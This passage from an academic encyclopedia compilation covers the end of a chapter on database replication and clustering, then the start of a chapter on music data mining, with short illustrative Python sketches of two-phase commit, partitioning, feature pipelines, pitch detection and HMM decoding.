a prepare request to all backups. If a backup can successfully log the changes, so that it can perform the update even in the presence of a fault, it responds with a “Yes” vote. If the primary collects “Yes” votes from all backups, it decides to commit the transaction. If it receives even a single “No” vote or it times out a backup, the primary decides to abort the transaction. In the second phase, the primary notifies the backups of its decision. Each backup then either commits or aborts the transaction locally according to the primary’s decision and sends an acknowledgment to the primary. As can be seen, the 2PC protocol incurs significant communication overhead. There are also other problems such as the potential blocking if the primary fails after all backups have voted to commit a transaction (Skeen, 1981). Consequently, there has been extensive research on alternative eager replication techniques, for example, the epidemic protocols (Agrawal et al., 1997; Stanoi, Agrawal, & El Abbadi, 1998), and multicast-based approaches (Kemme & Alonso, 2000; PatinoMartinez et al., 2005). However, they have not been adopted by any major commercial product due to their high overhead or complexities.
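The control flow of the 2PC protocol just described can be sketched in a few lines of Python. The Replica class, the transaction identifiers and the in-process "voting" are stand-ins for real networked backups and durable logging, and timeout handling is omitted.

```python
# Hypothetical sketch of the two-phase commit control flow described above.
# The Replica class, transaction ids and in-process "voting" stand in for
# real networked backups and durable logging; timeouts are omitted.
class Replica:
    def __init__(self, name):
        self.name = name

    def prepare(self, txn_id):
        # Phase 1: persist the redo records so the update survives a crash,
        # then vote. A replica that cannot log the changes would vote "No".
        return True                      # "Yes" vote

    def commit(self, txn_id):            # Phase 2: apply the decision
        print(f"{self.name}: commit {txn_id}")

    def abort(self, txn_id):
        print(f"{self.name}: abort {txn_id}")


def two_phase_commit(txn_id, backups):
    # Phase 1: the primary (coordinator) collects votes from every backup.
    votes = [b.prepare(txn_id) for b in backups]

    # Phase 2: commit only if all votes are "Yes"; otherwise abort everywhere.
    commit_decision = all(votes)
    for b in backups:
        b.commit(txn_id) if commit_decision else b.abort(txn_id)
    return commit_decision


two_phase_commit("txn-42", [Replica("backup-1"), Replica("backup-2")])
```

Even in this toy form, the blocking problem mentioned above is visible: between the two phases the backups hold resources while waiting for a decision that only the coordinator can make.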
Lazy Replication

Most commercial database systems support lazy replication. In lazy replication, the primary commits a transaction immediately. The redo log, which reflects the changes made for the recently committed transactions, is transferred to the backups asynchronously. Usually, the backup replicas lag behind the primary by a few transactions. This means that if the primary fails, the last several committed transactions might get lost. Besides the primary/backup replication approach, some database management systems allow a multi-primary configuration where all replicas are allowed to accept update transactions. If this configuration is used with lazy replication, different replicas might make incompatible decisions, in which case manual reconciliation is required.

Database Clustering

In recent years, database clustering has evolved to be the most promising technique to achieve high availability as well as high scalability (Ault & Tumma, 2003; Davies & Fisk, 2006). Database clustering, as the name suggests, uses a group of computers interconnected by a high-speed network. In the cluster, multiple database server instances are deployed. If one instance fails, another instance takes over very quickly, so high availability is ensured. Database clustering not only brings high availability, but the scaling-out capability as well. Scaling-out means that the capacity of a database management system can be dynamically increased by adding more inexpensive nodes while keeping the old equipment. There are two alternative approaches in database clustering. One approach, pioneered in Oracle RAC, adopts a shared-everything architecture. A number of other products choose to use the shared-nothing architecture. Both approaches have their challenges and advantages.

Shared-Everything Cluster

In a shared-everything database cluster, all server instances share the same storage device, such as a storage area network. The cluster nodes typically connect to the shared storage device via a fiber channel switch or shared SCSI for fast disk I/O. The shared storage device must also have built-in redundancy, such as mirrored disks, to mask disk failures. To minimize disk I/O, all server instances share a common virtual cache space. The virtual cache space consists of local cache buffers owned by individual server instances. A number of background processes are used to maintain the consistency of the data blocks in the
cache space. These processes are also responsible for synchronizing access to the cached data blocks, because only one server instance is allowed to modify a data block at a time. Each server instance has its own transaction logs stored on the shared disk. If a server instance fails, another server instance takes over by performing a roll-forward recovery using the redo log of the failed server instance. This ensures that the changes made by committed transactions are recorded in the database and do not get lost. The recovering instance also rolls back the transactions that were active at the time of the failure and releases the locks on the resources used by those transactions. The shared-everything design makes it unnecessary to repartition the data, and therefore eases the tasks of cluster maintenance and management. However, this benefit does not come for free. The most prominent concern is the cost of inter-node synchronization. Unless a high-speed interconnect is used and the workload is properly distributed among the server instances, inter-node synchronization might limit the scalability of the cluster. In addition, the requirement for a high-speed shared disk system imposes a higher financial cost than using conventional disks.
Shared-Nothing Cluster

In a shared-nothing database cluster, each node runs one or more server instances and has its own memory space and stable storage. Essential to the shared-nothing approach, the data must be partitioned either manually or automatically by the database system across different nodes. Each partition must be replicated in two or more nodes to keep the desired redundancy level. Concurrency control and caching are carried out in each local node, and therefore they are more efficient than those in shared-everything clusters. However, to ensure the consistency of replicated data and fast recovery, the two-phase commit protocol is often used to ensure atomic commitment of the
transactions in the cluster. Compared with the shared-everything approach, the cost of inter-node synchronization is essentially replaced by that of distributed commit. The shared-nothing approach faces the additional challenge of split-brain syndrome prevention (Birman, 2005). The split-brain syndrome may happen if the network partitions, and if each partition makes incompatible decisions on the outcome of transactions or their relative orders. To prevent this problem, typically only the main partition is allowed to survive. The minor partition must stop accepting new transactions and abort its active transactions. Usually, the main partition is the one that consists of the majority of the replicas or the one that contains a special node designated as the arbitration node (Davies & Fisk, 2006).
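Two of the ideas above, partitioning data across nodes and surviving only in the majority partition, can be sketched as follows. The node names, the hash-based placement rule and the plain majority test are illustrative assumptions rather than the scheme of any particular product.

```python
# Hypothetical sketch of two shared-nothing ideas: hash-partitioning rows
# across nodes, and the majority rule used against split-brain. Node names
# and the placement rule are illustrative, not any product's actual scheme.
import hashlib

NODES = ["node-a", "node-b", "node-c", "node-d"]

def owner_node(key, nodes=NODES):
    """Deterministically map a row key to the node holding its partition."""
    digest = hashlib.sha1(str(key).encode()).hexdigest()
    return nodes[int(digest, 16) % len(nodes)]

def partition_may_continue(reachable_nodes, all_nodes=NODES):
    """Split-brain guard: only a side holding a strict majority keeps running."""
    return len(reachable_nodes) > len(all_nodes) / 2

print(owner_node(12345))                             # prints one of the four node names
print(partition_may_continue(["node-a", "node-b"]))  # False: 2 of 4 is not a majority
```

With an even number of nodes, neither half of a clean split holds a majority, which is exactly why a designated arbitration node is used in practice.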
FUTURE TRENDS

Existing database systems are designed to tolerate process crash fault and hardware fault. However, considering the increased pace of security breaches, future database management systems must be designed to be intrusion tolerant — that is, they should provide high availability against a variety of security threats, such as the unauthorized deletion and alteration of database records, the disruption of distributed commit (may cause replica inconsistency), and the exposure of confidential information. To make a database system intrusion tolerant, many fundamental protocols such as the 2PC protocol must be enhanced. There may also be a need to design special tamper-proof storage devices to protect data integrity (Strunk, Goodson, Scheinholtz, Soules, & Ganger, 2000). Even though there has been intensive research in this area (Castro & Liskov, 2002; Malkhi & Reiter, 1997; Mohan, Strong, & Finkelstein, 1983; Deswarte, Blain, & Fabre, 1991), the results have rarely been incorporated into commercial products
yet. The primary barriers are the high computation and communication cost, the complexity, and the high degree of replication required to tolerate malicious faults.
CONCLUSION

Database systems are the cornerstones of today's information systems. The availability of database systems largely determines the quality of service provided by the information systems. In this article, we provided a brief overview of the state-of-the-art database replication and clustering techniques. For many, a low-cost shared-nothing database cluster that uses conventional hardware might be a good starting point towards high availability. We envisage that future generations of database management systems will be intrusion tolerant, that is, capable of continuous operation against not only hardware and process crash faults, but a variety of security threats as well.
REFERENCES Agrawal, D., El Abbadi, A., & Steinke, R.C. (1997). Epidemic algorithms in replicated databases. Proceedings of the ACM Symposium on Principles of Database Systems (pp. 161-172), Tucson, AZ. Ault, M., & Tumma, M. (2003). Oracle9i RAC: Oracle real application clusters configuration and internals. Kittrell, NC: Rampant TechPress. Bernstein, P.A., Hadzilacos, V., & Goodman, N. (1987). Concurrency control and recovery in database systems. Reading, MA: Addison-Wesley. Birman, K. (2005). Reliable distributed systems: Technologies, Web services, and applications. Berlin: Springer-Verlag.
Castro, M., & Liskov, B. (2002). Practical Byzantine fault tolerance and proactive recovery. ACM Transactions on Computer Systems, 20(4), 398-461. Davies, A., & Fisk, H. (2006). MySQL clustering. MySQL Press. Deswarte, Y., Blain, L., & Fabre, J.C. (1991). Intrusion tolerance in distributed computing systems. Proceedings of the IEEE Symposium on Research in Security and Privacy (pp. 110-121). Oakland, CA: IEEE Computer Society Press. Gray, J., & Reuter, A. (1993). Transaction processing: Concepts and techniques. San Mateo, CA: Morgan Kaufmann. Kemme, B., & Alonso, G. (2000). A new approach to developing and implementing eager database replication protocols. ACM Transactions on Database Systems, 25(3), 333-379. Malkhi, D., & Reiter, M. (1997). Byzantine quorum systems. Proceedings of the ACM Symposium on Theory of Computing (pp. 569-578), El Paso, TX. Mohan, C., Strong, R., & Finkelstein, S. (1983). Method for distributed transaction commit and recovery using Byzantine agreement within clusters of processors. Proceedings of the ACM Symposium on Principles of Distributed Computing (pp. 89-103), Montreal, Quebec. Patino-Martinez, M., Jimenez-Peris, R., Kemme, B., & Alonso, G. (2005). Middle-R: Consistent database replication at the middleware level. ACM Transactions on Computer Systems, 375-423. Skeen, D. (1981). Nonblocking commit protocols. Proceedings of the ACM International Conference on Management of Data (pp. 133-142), Ann Arbor, MI. Stanoi, I., Agrawal, D., & El Abbadi, A. (1998). Using broadcast primitives in replicated databases. Proceedings of the IEEE International Conference
on Distributed Computing Systems (pp. 148-155), Amsterdam, The Netherlands. Strunk, D., Goodson, G., Scheinholtz, M., Soules, C., & Ganger, G. (2000). Self-securing storage: Protecting data in compromised systems. Proceedings of the USENIX Association Symposium on Operating Systems Design and Implementation (pp. 165-189), San Diego, CA.
KEY TERMS

Database Cluster (Shared-Everything, Shared-Nothing): A database management system runs on a group of computers interconnected by a high-speed network. In the cluster, multiple database server instances are deployed. If one instance fails, another instance takes over very quickly to ensure high availability. In the shared-everything design, all nodes can access a shared stable storage device. In the shared-nothing design, each node has its own cache buffer and stable storage.

Database Recovery (Roll-Backward, Roll-Forward): Recovery is needed when a database instance that has failed is restarted or a surviving database instance takes over a failed one. In roll-backward recovery, the active transactions at the time of failure are aborted and the resources allocated for those transactions are released. In roll-forward recovery, the updates recorded in the redo log are transferred to the database so that they are not lost.

Database Replication (Eager, Lazy): Multiple instances of a database management system
are deployed in different computers (often located in different sites). Their state is synchronized closely to ensure replica consistency. In eager replication, the updates are propagated and applied to all replicas within the transaction boundary. In lazy replication, the changes are propagated from one replica to others asynchronously.

High Availability (HA): The capability of a system to operate with long uptime and to recover quickly if a failure occurs. Typically, a highly available system implies that its measured uptime is five nines (99.999%) or better, which corresponds to 5.25 minutes of planned and unplanned downtime per year.

Split-Brain Syndrome: This problem may happen if the network partitions in a database cluster, and if each partition makes incompatible decisions on the outcome of transactions or their orders. To prevent this problem, typically only the main partition is allowed to survive.

Transaction: A group of read/write operations on the same data set that succeeds or fails atomically. More accurately, it is a group of operations that has atomicity, consistency, isolation, and durability properties.

Two-Phase Commit Protocol (2PC): This protocol ensures atomic commitment of a transaction that spans multiple nodes in two phases. During the first phase, the coordinator (often the primary replica) queries the prepare status of a transaction. If all participants agree to commit, the coordinator decides to commit. Otherwise, the transaction is aborted. The second phase is needed to propagate the decision to all participants.
This work was previously published in Encyclopedia of Information Science and Technology, Second Edition, edited by M. Khosrow-Pour, pp. 1733-1737, copyright 2009 by Information Science Reference, formerly known as Idea Group Reference (an imprint of IGI Global).
Chapter 1.4
Mining in Music Databases
Ioannis Karydis
Aristotle University of Thessaloniki, Greece
Alexandros Nanopoulos
Aristotle University of Thessaloniki, Greece
Yannis Manolopoulos
Aristotle University of Thessaloniki, Greece
ABSTRACT

This chapter provides a broad survey of music data mining, including clustering, classification and pattern discovery in music. The data studied are mainly symbolic encodings of musical scores, although digital audio (acoustic data) is also addressed. Throughout the chapter, practical applications of music data mining are presented. Music data mining addresses the discovery of knowledge from music corpora. This chapter encapsulates the theory and methods required in order to discover knowledge in the form of patterns for music analysis and retrieval, or statistical models for music classification and generation. Music data, with their temporal, highly structured and polyphonic character, introduce new challenges for data mining. Additionally, due to their complex structure and their susceptibility to inaccuracies caused by perceptual effects, music data present challenges in knowledge representation as well.

INTRODUCTION

Musical analysis is recognised as a significant part of the study of musical cognition. The analysis of music data has the objective of determining the fundamental point of contact between mind and musical sound (musical perception) (Bent, 1980). Musical analysis is the activity musicologists are engaged in, and it is conducted on a single piece of music, on a portion or element of a piece, or on a collection of pieces. This research area encompasses the field of music data mining (henceforth called music mining), which deals with the theory and methods of discovering knowledge from music pieces and can be considered as a collection of (semi-)automated methods for analysing music data. Following music-mining methodologies, music analysts extract1 recurring structures and their organisation in music pieces, trying to understand the style and techniques of composers
(Rolland & Ganascia, 2002). However, the size and peculiarities of music data may become prohibitive factors for the aforementioned task. This represents an analogy to the difficulties faced by data analysts when trying to discover patterns from databases, i.e., the huge database sizes and the large number of dimensions, which are the very reasons that paved the way for the development of database mining, a.k.a. data mining or knowledge discovery from databases (KDD). Despite the previously mentioned analogy between music mining and database mining, the nature of music data requires the development of radically different approaches. In the remainder of this section we summarise the particular challenges that music mining presents. Another key issue in which music mining differs from other related areas (for instance, database mining or Web mining) is the applications it finds. Discovered patterns from relational or other types of databases are usually actionable, in the sense that they may suggest an action to be taken. For instance, association rules from market-basket data may indicate an improvement in selling policy, or user-access patterns extracted from a Web-log file may help in redesigning the Web site. Such kinds of "actionability" are related to a form of "profit" and stem from the involved industry field (e.g., retail, insurance, telecommunications, etc.). The question that therefore emerges is: "What is the usability of patterns extracted from music data?" In order to answer this question, one has to consider the current status of the involved industry, that is, the "music industry." The influence that music has always had on people is reflected in the music commodities and services that are offered today.2 The annual gains of the music industry are estimated to reach up to several billion dollars (Leman, 2002). Within this context, music content is a source of economic activity. This is intensified by the ease that the Web has brought to the delivery of music content; a prominent example of this case is Napster. What is, thus, becoming of significant
interest is the need for content-based searching within music collections, e.g., by using a Karaoke machine to retrieve similar songs over a Web site or by humming over a mobile phone to download a song. The corresponding research field that has been developed is called content-based music information retrieval (CBMIR) (Lippincott, 2002; Pfeiffer, Fischer, & Effelsberg, 1996). It is natural, therefore, to anticipate that music mining finds applications in designing effective CBMIR systems. In fact, CBMIR has considerably biased the directions that research in music mining is now following by stating the objectives to be achieved. The contribution of music mining in CBMIR is better understood by considering that the extracted patterns describe and represent music content at different abstraction levels (e.g., by producing concept taxonomies). The description of music content with such representations helps users in posing queries using content descriptors (rational or emotional), which drastically improve the effectiveness of retrieval in CBMIR systems (Leman, 2002), compared to simplistic search using plain text descriptors like song titles or the composers’ names. Additionally, searching times are decreased, since the extracted patterns constitute a more compact representation of music content. The advantages from both the aforementioned directions are evident in a broad range of commercial domains, from music libraries to consumer oriented e-commerce of music (Rolland & Ganascia, 2002).
The Challenges of Music Data Mining

Byrd and Crawford (2002) list several reasons for which it is difficult to manage music data. Since most of these issues are inherent in music data due to their nature, they also affect the process of music data mining. In particular, among the most significant problems and difficulties that arise in music data mining are:
(a) the identification of meaningful musical units;
(b) the simultaneity of independent voices (denoted as polyphony);
(c) the fact that patterns are repeated approximately and not exactly (due to variations and ornamentation posed by composers);
(d) discrepancies (denoted as "errors") caused by differences between performances;
(e) the large size of music data, which burdens scalability; and
(f) the non-existence of trivial ways to incorporate background knowledge.
The aforesaid issues, along with references to solutions provided for them, are detailed in the following. The most basic difficulty stems from the fact that it has not been clear so far how to automatically segment music data into meaningful units, like music phrases or motives. In order to be able to extract patterns, it is reasonable to desire the representation of music in such units, in the way that text mining considers words as units of text data that are used for pattern searching3 . Although the difficulty is larger for acoustic representations of music, it is not easy to detect basic units in symbolic representation as well (for representation types, see the following section on music databases). The problem is further intensified by considering that there exists an amount of overlap between music units; one such case is due to polyphony. A number of research works (Chai & Vercoe, 2003; Temperley, 2001; Meredith, 2003) have diversely addressed this issue. Polyphony is an additional source of difficulties. For simplicity, initial attempts in music mining focused on symbolic representation of monophonic music. Polyphony, however, is present in almost all real works of music. The difficulty arises from the fact that it is required to separate simultaneous independent voices in order to distinguish them, in the same way that one separately recognises the lines of each char-
acter in a play. This problem is considered the most intractable and can significantly impact the quality of the analysis (Byrd & Crawford, 2002), as music phrases may appear audibly only a few times while occurring frequently in the music score (e.g., buried within repeated chords). Different approaches (Pickens, 2001; Liu, Wu, & Chen, 2003) have been proposed in the literature in order to address polyphony. Repetition of occurrence signals a pattern in almost all mining fields (database, Web, or text mining). However, in all these fields, patterns are repeated exactly. In music mining, one should not focus on exact repetition of patterns, due to the variation and ornamentation that are present in music data (Rolland & Ganascia, 2002). Therefore, algorithms searching for music patterns, such as those of Cambouropoulos et al. (1999) and Clifford and Iliopoulos (2004, see section Methods for MIDI Representation), should take this peculiarity into account as well. Data quality is a factor that is taken into account by all mining fields. Data cleansing methods are used to avoid the discovery of patterns that will lead to pitfalls. It therefore comes as no surprise that music data are very prone to errors, since there is very little quality control publicly available (Byrd & Crawford, 2002). However, music data have an additional source of "error," which is the result of differences in performance-related characteristics; differences in key, tempo, or style cause different instantiations of an identical musical score. These factors have to be additionally taken into account when searching for patterns. All the aforementioned issues concern the effectiveness of the music mining process. Another important aspect is efficiency. Music databases tend to be large, both due to the large number of music pieces they contain and the large size of each piece. The objective is, therefore, to develop scalable algorithms for music mining. It is worth noticing that many existing approaches are influenced by soft-computing methodologies. Soft computing methodologies involve fuzzy sets,
These methodologies aim at providing approximate solutions at low cost, thereby speeding up the process (Mitra, Pal, & Mitra, 2004). Although there have been attempts to provide solutions for very large databases (e.g., in the field of neural networks), in general, the problem of scalability to extremely large database sizes is still a challenging issue (Mitra, Pal, & Mitra, 2004). Moreover, algorithms for finding repeating patterns are confined to main-memory resident data. Hence, another challenge is to develop algorithms for disk-resident data. Finally, it must be noted that although the incorporation of background knowledge into the mining process is considered important, it remains a generally vague issue. Domain-specific knowledge seems to be a sine qua non in music mining. What is, therefore, required is the systematic development of methods to incorporate this knowledge into the music mining process, a task that is very hard.
Chapter Outline

In the remainder of this chapter, we summarise existing work on music mining. First, we give the necessary background on music databases. Next, we examine the task of similarity searching, which has attracted significant attention in research related to CBMIR. Similarity searching in music mining is of high importance, as it serves as a primitive for more complex undertakings. In the two sections that follow, we study methods for clustering and classification of music data. Clustering methods perform unsupervised learning, whereas supervised learning methods have mainly been used for tasks such as genre classification. Next, we move on to examine algorithms for detecting repeating patterns, and we also discuss the special issue of theme finding. In the final section, we conclude this chapter and present the perspectives of music mining.
MUSIC DATABASES

It is only in the last decade that large-scale computer-based storage of sound and music has become possible. Additionally, the increasing ease of distribution of music in computer files over the Internet gave further impetus to the development of digitised music databases as well as to new methods for music information retrieval (MIR) in these collections. Initial efforts for information retrieval (IR) in music databases relied on the well-studied text IR, that is, on the metadata of the music objects (title, composer, performer, genre, date, etc. — see the extension of the mp3 format, called ID3-Tag, for an example). Although abundantly used, even nowadays, the traditional metadata of a music object give rather minimal information about the actual content of the music object itself. Moreover, metadata are in most cases manually maintained, a process that is notoriously time consuming. On the other hand, queries based on humming (using a microphone) or on a small piece of a music file are a more natural approach to MIR. These types of queries lie within the scope of CBMIR. In CBMIR, an actual music piece is required in order to compare its content with the content of the music pieces already available in the database.
Music Data Representation and Format Conversion

Music is available in two basic representations: the symbolic representation (MIDI, humdrum format) and the acoustic representation (audio formats — wav, mp3, wma, etc.). Their key difference lies in the fact that symbolic representations carry information about what a music performer should play, whereas acoustic representations comprise a specific recorded performance of a music piece. In other words, the term “music” encompasses both the performance directions and the resulting sounds.
The symbolic representation can further be separated into two classes, according to the targeted performer. Thus, there exist symbolic representations aimed at digital devices, such as the MIDI and humdrum formats, as well as human-oriented symbolic representations that are collectively referred to as conventional music notation (CMN). A MIDI (Musical Instrument Digital Interface) object consists of predefined “events,” that is, quantified factors that define a musical performance (Owen, 2000). Typical events include the notes to be played, the time instant at which and the force with which these notes should be played, and the type of instrument playing them, to name a few. Given the high level of detail an event may contain, a MIDI object can quite accurately describe a music performance, and thus its use is rather popular, especially for classical music playback. Additionally, the MIDI format is also used to communicate music between digital devices since it is codified4 and has wide acceptance, thus offering interoperability between different types of music-aware devices. CMN commonly includes numerous features that are not defined in the MIDI protocol, such as rests, slurs, barlines, triplets and chromatisms. O’Maidin and Cahill (2001) propose C.P.N.View (common practice notation view), a complex object framework that serves as a container for a collection of objects modelling music scores, together with iterators for use with the available algorithms. C.P.N.View is a class library for representing musical scores in a form suitable for arbitrary processing. Another approach to score-based music representation is presented by Hoos et al. (1998), which utilises the GUIDO music notation. The GUIDO music notation format is a novel, general-purpose formal language for representing score-level music in a human-readable way. Music in the acoustic representation consists of a time series of sampled signal amplitude
values. These values represent the air pressure changes created by the music source, which propagate from the source (e.g., loudspeaker or violin) to the listener’s ears as air pressure fluctuations. A very simple method of illustrating acoustical signals is to draw them as a graph of air pressure versus time (Figure 1). In that case, the representation of the acoustical signal is called a time-domain representation, and the amplitude of the waveform is the amount of air pressure change (Roads, 1996). Since the conversion of symbolic music to and from CMN is generally admitted to be easy, interest in this section focuses on the process of analysing music in the acoustic representation, so as to identify the elements that constitute the piece of music in question (Klapuri, 2004). This process is known as music transcription. The notation utilised for the symbolic representation of the acoustic format can be any symbolic representation offering sufficient information for the transcribed piece to be performed. Although skilled musicians are able to perform music transcription with high success (Klapuri, 2004), computer music transcription is generally acknowledged to be very difficult and to perform poorly (Yang, 2002; Pickens, 2004). The performance of computer systems degrades even more when the transcribed music piece is polyphonic. A polyphonic music piece (see Figure 2), for the purposes of this work, refers to a music piece wherein at any time instant more than one sound may occur — that is, more than one voice or, in simple terms, more than one note at a time.
Figure 1. Time domain representation of a signal (amplitude of air pressure versus time)
Figure 2. An example of a monophonic, homophonic and polyphonic music piece.
In contrast, in a monophonic score only one voice/note is playing at any time (see Figure 2). The last 10 years of research in polyphonic music transcription have brought a great deal of knowledge to the area, though no generally applicable all-purpose system exists. The latest proposals achieve a certain degree of accuracy in limited-complexity polyphonic music transcription (Davy & Godsill, 2003; Bello, 2003). Their common limitations include, as prerequisites for acceptable performance, a restricted number of concurrent sounds and the absence of percussive instruments. Despite this unfavourable research landscape, a small number of commercial music transcription systems have been available (AKoff, 2001; Arakisoftware, 2003; Innovative, 2004; Seventh, 2004)5, though their performance is rather poor as far as accuracy is concerned (Klapuri, 2004).
Synopsis of the Process for Knowledge Extraction in Music Databases

Having described how music databases are organised, we now move on to examine the whole process of knowledge extraction. In general, the process of knowledge discovery in databases (KDD process) refers to the broad process of finding knowledge in data, while connoting the “high-level” application of particular data mining methods. Analogously, in music databases, the unifying goal of the KDD process is to extract knowledge from music data in the context of large music databases.
This objective is achieved by using music data mining algorithms that extract what is deemed knowledge, according to specified measures and thresholds, and by using a database along with any required pre-processing, sub-sampling and transformations of that database. The overall KDD process has been established over the years to comprise the stages illustrated in Figure 3. In summary, we can identify three main parts in the process: the pre-processing of music data, the core-mining step and the post-processing of mined knowledge. In the context of music data mining, the aforesaid three main parts are instantiated as follows. Regarding pre-processing, most of the effort in related research has been devoted to methods for feature extraction and selection. Also related to this part is the research on music database indexing, which can improve the effectiveness and efficiency of the selection stage (see Figure 3). The core-mining part involves several methods that have been adapted from other data mining areas; however, due to the peculiarities of music data, several other, novel methods have been developed as well. Finally, although the post-processing part is an integral part of the KDD process, in music data mining it has received relatively little attention compared to other data mining areas. In the remainder of this chapter we elaborate further on the first two parts, and give examples and methods for the problems that have been examined in recent research. Concluding this discussion, it is useful to contemplate a sample scenario of the KDD process in music databases.
Figure 3. Overview of steps constituting the KDD process (Fayyad, Piatetsky-Shapiro & Smyth, 1996)
Assume a music analyst who has a database of pop, rock and heavy metal songs from the years 1970 to 2000. As an initial step, the analyst performs a selection of all songs from the 1980s. Next, he or she selects as features the timbre, pitch and rhythm. For the core mining, he or she selects a classification algorithm that has been adapted for genre classification. The outcome of this process is a characterisation of the selected songs according to their genre.
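To make the stages of this scenario concrete, the sketch below wires the selection, feature-extraction and core-mining steps together in Python. The helper extract_features and the song dictionaries are hypothetical placeholders (no such API is defined in this chapter), and the classifier is an off-the-shelf k-nearest-neighbours model used purely for illustration.

```python
# Hypothetical sketch of the scenario's KDD pipeline; extract_features()
# is a placeholder for whatever feature-extraction code a system provides.
from sklearn.neighbors import KNeighborsClassifier

def characterise_by_genre(training_songs, database):
    # Selection: keep only the songs from the 1980s.
    selected = [s for s in database if 1980 <= s["year"] < 1990]

    # Pre-processing: extract timbre, pitch and rhythm descriptors.
    X_train = [extract_features(s, ("timbre", "pitch", "rhythm"))
               for s in training_songs]
    y_train = [s["genre"] for s in training_songs]
    X_new = [extract_features(s, ("timbre", "pitch", "rhythm"))
             for s in selected]

    # Core mining: a classifier (here plain k-NN) adapted to genre labels.
    clf = KNeighborsClassifier(n_neighbors=5)
    clf.fit(X_train, y_train)
    return clf.predict(X_new)        # one genre label per selected song
```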
Music Features

Music consists of numerous features. Among them, pitch, rhythm, timbre and dynamics are considered to be the most semantically important ones (Byrd & Crawford, 2002). For western music in particular, pitch carries the highest relative weight of information, followed by rhythm (Byrd & Crawford, 2002). For the MIR process to apply matching algorithms to the music data, descriptions of these features for the music data are necessary.
Thus, the previously mentioned representations require a conversion from their original format to the format defined by each MIR system. This conversion process is also known as feature extraction. The selection of features to be converted by the feature extraction process is implementation dependent. That is, a variety of alternatives exist with respect to the music characteristics that should be included in the final format. The feature selection and extraction process can be separated, based on the representation of the music piece, into symbolic and acoustic feature extraction, while the former can be further divided into monophonic, homophonic and polyphonic (see Figure 4). Music in the acoustic representation requires special analysis in order to extract features such as pitch and rhythm, and the non-triviality of the problem is reflected by the number of methods developed. The key idea in this case is the transcription of audio into feature events.
Figure 4. Feature extraction process for (a) acoustic and (b) symbolic music pieces
The most common features (Wieczorkowska & Ras, 2001) are the coefficients of time-domain analysis (Papaodysseus et al., 2001; Paraskevas & Mourjopoulos, 1996), spectral analysis (Papaodysseus et al., 2001; Paraskevas & Mourjopoulos, 1996; Kostek & Wieczorkowska, 1997) and wavelet analysis (Wieczorkowska, 2001). Pitch detection6 is dealt with via time-domain fundamental-period pitch detection, autocorrelation pitch detection (see Figure 5a), adaptive filter pitch detection (see Figure 5b), cepstrum analysis and frequency-domain pitch detection. It should be noted that no pitch detection algorithm is totally accurate, and those that appear to be either require music inputs that follow specific constraints or exhibit increased computational requirements (non-real-time). Key difficulties in pitch detection include attack transients, low- and high-frequency identification, myopic pitch tracking and acoustical ambience. In the case of polyphonic acoustic signals, the complexity rises further, and attempts in this direction usually apply frequency-domain analysis techniques within a fundamental-pitch or strong-harmonics selection mechanism. Rhythm detection can be divided into three levels: low-level (event detection), mid-level (transcription into notation) and high-level (style analysis). As with pitch detection, rhythm detection is also inherently difficult, due to inaccurate human performance of musical scores as well as the ambiguity of music notation7. Moving on to music in the form of symbolic representation, feature extraction from MIDI-like music files is rather easier.
The results of transcription (the first step of acoustic feature extraction) are already available in some form. In monophonic music, no note may sound until those currently sounding have finished; in homophonic music, simultaneous notes may start and finish sounding together; in polyphonic music, a note may sound before a previous one has finished. Homophonic and polyphonic music are addressed by reduction to monophonic and homophonic music, respectively, and by modification of the methods utilised for monophonic music. The problem of monophonic symbolic feature extraction can be reduced to n dimensions by retaining only n different features of the information described in the music file. Additional approaches include N-grams (e.g., sliding windows and repeating patterns) and shallow structure methods (Pickens, 2001) (e.g., statistical measures, lightweight computation and music theory analysis). Monophonic reduction is an initial attempt to solve the problem of simultaneously sounding notes by selecting only one of the notes sounding at any discrete time instant. Accordingly, monophonic methods can be utilised for feature extraction from the resulting monophonic music. The key issue in monophonic reduction is the method for selecting the “representative” note. In homophonic reduction, instead of selecting only one note at each time step, all notes at each time step are retained, and the reduction that occurs assumes independence of notes with overlapping durations (Pickens, 2001).
Figure 5. Pitch detection process with (a) autocorrelation and (b) adaptive filter
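As an illustration of the autocorrelation approach of Figure 5a, the following sketch estimates the fundamental frequency of a monophonic frame as the lag that maximises the autocorrelation within a plausible pitch range. It is a minimal baseline under the stated assumptions; real detectors must also cope with the difficulties listed above (attack transients, octave errors, ambience).

```python
import numpy as np

def autocorrelation_pitch(frame, sample_rate, fmin=50.0, fmax=1000.0):
    """Estimate the fundamental frequency (Hz) of one audio frame by
    locating the autocorrelation peak between the lags of fmax and fmin."""
    frame = frame - np.mean(frame)                  # remove DC offset
    ac = np.correlate(frame, frame, mode="full")    # full autocorrelation
    ac = ac[len(ac) // 2:]                          # keep non-negative lags

    lag_min = int(sample_rate / fmax)               # smallest plausible period
    lag_max = int(sample_rate / fmin)               # largest plausible period
    lag = lag_min + np.argmax(ac[lag_min:lag_max])
    return sample_rate / lag                        # period -> frequency

# A synthetic 440 Hz tone should be detected at (approximately) 440 Hz.
sr = 22050
t = np.arange(2048) / sr
print(autocorrelation_pitch(np.sin(2 * np.pi * 440 * t), sr))
```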
Finally, as a means of producing features that can be indexed, clustered and matched for similarity, research has used hidden Markov models (HMMs). An HMM is a Markov chain in which each state generates an observation; only the observations are visible. From an observed sequence of outputs, one can infer the most likely underlying dynamical system, yielding a model of the underlying process, or, alternatively, infer the most likely sequence of hidden states. HMMs have been extensively used in MIR. Numerous approaches (Pikrakis, Theodoridis, & Kamarotos, 2002; Shifrin, Pardo, Meek, & Birmingham, 2002; Velivelli, Zhai, & Huang, 2003) have utilised HMMs in order to represent both the music pieces in a database and the queries posed. In Pikrakis, Theodoridis, and Kamarotos (2002), a method for the automated search of predefined sound patterns within a large number of sound files is presented, using HMMs. In Shifrin, Pardo, Meek, and Birmingham (2002), the authors use a stochastic representation of both the music sequences in the system and the queries, with hidden Markov models, in order to handle queries that contain errors or key and tempo changes. Velivelli et al. (2003) utilise HMMs that can model predefined patterns and simultaneously identify and match an audio segment for a given query.
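The inference step mentioned above, recovering the most likely hidden state sequence from the observations, is typically performed with the Viterbi algorithm. The sketch below is a generic, self-contained implementation for small discrete HMMs; it is illustrative only and does not reproduce the models used in the cited systems.

```python
import numpy as np

def viterbi(obs, start_p, trans_p, emit_p):
    """Most likely hidden-state sequence for a discrete observation sequence.
    start_p: (S,), trans_p: (S, S), emit_p: (S, O) probability arrays."""
    n_states, T = len(start_p), len(obs)
    logp = np.full((T, n_states), -np.inf)      # best log-probability so far
    back = np.zeros((T, n_states), dtype=int)   # back-pointers

    logp[0] = np.log(start_p) + np.log(emit_p[:, obs[0]])
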